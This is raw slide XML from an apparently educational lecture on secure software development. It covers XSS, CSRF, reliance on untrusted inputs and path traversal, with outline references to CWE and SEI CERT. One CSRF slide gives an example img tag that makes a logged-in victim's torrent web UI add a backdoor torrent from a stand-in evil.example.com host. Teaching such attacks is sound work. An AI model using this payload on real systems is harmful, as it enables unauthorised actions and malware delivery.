          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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37" name="Shape 337"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Shape 338"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339" name="Shape 339"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Cross-site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340" name="Shape 340"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="341" name="Shape 341"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="182350" y="2156325"/>
            <a:ext cx="11827299" cy="3267599"/>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46" name="Shape 346"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="Shape 347"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>The application uses a protection mechanism that relies on the existence or values of an input, but the input can be modified by an untrusted actor in a way that bypasses the protection mechanism.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348" name="Shape 348"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Reliance on Untrusted Inputs in a Security Decision</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="Shape 349"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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54" name="Shape 354"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Shape 355"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356" name="Shape 356"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Reliance on Untrusted Inputs in a Security Decision</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="Shape 357"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="358" name="Shape 358"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="509600" y="2078400"/>
            <a:ext cx="11748500" cy="2961599"/>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5" name="Shape 95"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Shape 96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367433" cy="4611686"/>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安全軟體開發生命週期簡介</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="56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MITRE common weakness enumeration (CWE)簡介</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="56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SEI CERT coding standard簡介</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS"/>
              <a:ea typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
              <a:sym typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Shape 97"/>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Outline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Shape 98"/>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b="0" i="0" lang="zh-TW" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>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63" name="Shape 363"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="364" name="Shape 364"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>Attackers who can find a reproducible link that executes a specific action on the target page while the victim is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>logged in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t> there can embed such link on a page they control and trick the victim into opening it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="Shape 365"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366" name="Shape 366"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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71" name="Shape 371"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Shape 372"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>&lt;img src="http://xxx/gui/?action=add-url&amp;s=http://evil.example.com/backdoor.torrent"&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="Shape 373"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="Shape 374"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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79" name="Shape 379"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="CSRF 02" id="380" name="Shape 380" title="CSRF 02"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="586750" y="1535425"/>
            <a:ext cx="6375400" cy="3327400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="CSRF 03" id="381" name="Shape 381" title="CSRF 03"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5593075" y="3775700"/>
            <a:ext cx="6375400" cy="2921000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382" name="Shape 382"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217175" y="6007600"/>
            <a:ext cx="5144400" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>http://cyrilwang.pixnet.net/blog/post/31813568-%5B%E6%8A%80%E8%A1%93%E5%88%86%E4%BA%AB%5D-cross-site-request-forgery-(part-1)</a:t>
            </a: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87" name="Shape 387"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388" name="Shape 388"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>e.g.   ../</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="Shape 389"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
